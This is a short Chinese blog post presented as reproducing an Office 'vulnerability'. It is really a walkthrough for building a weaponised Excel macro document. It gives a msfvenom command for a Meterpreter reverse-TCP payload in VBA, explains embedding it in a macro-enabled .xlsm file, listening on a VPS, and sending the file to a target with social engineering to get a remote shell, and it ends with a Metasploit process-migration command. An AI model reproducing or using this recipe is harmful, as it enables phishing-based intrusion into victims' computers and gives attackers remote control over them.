title: office漏洞复现

date: 2019-7-29 23:10:29

tags: 复现

刚刚无聊,看到有人在讲office漏洞,所以我就顺便尝试一下。
首先,先生成shellcode。

  1. msfvenom -p windows/meterpreter/reverse_tcp lhost=*.*.*.* lport=**** -f vba -o code.txt

生成好的shellcode呢,是文本的样子的,
office漏洞复现 - 图1
要把他放在office当中。我这里就直接用的excel。
新建一个表格,在表格选项—信任中心—信任中心选项—宏设置中,启用所有宏
office漏洞复现 - 图2
开启录制宏,并且将shellcode编辑进宏
一开始的文档是没有任何宏的,需要我们手动录制一个,看下图,点开录制宏,然后再停止录制就好了
office漏洞复现 - 图3
然后点击查看宏,就可以看到有一个“”宏1“”的东西了,然后点击编辑
office漏洞复现 - 图4
将shellcode复制粘贴进去就好了,直接关闭掉宏窗口,他会自动保存的
office漏洞复现 - 图5
然后保存整个文档,他会提示以下信息
office漏洞复现 - 图6
这里选择“否”,他会跳出另存为的页面,选择第二个,保存为“.xlsm”的文件即可。
office漏洞复现 - 图7
随后,在自己的VPS上监听(需要跟开始设置的shellcode配置相同的ip和端口)。
office漏洞复现 - 图8
然后将文档发给目标,通过社工等任意方法,让其打开该文档即可反弹shell。下面是我自己打开的样子。
office漏洞复现 - 图9
因为该shell只有在打开文档的情况下连接,所以我就用了

run post/windows/manage/migrate

来自动迁移进稳定的进程了,并且看到我的电脑用户名叫pt。拿到shell了后面的事就不在介绍了。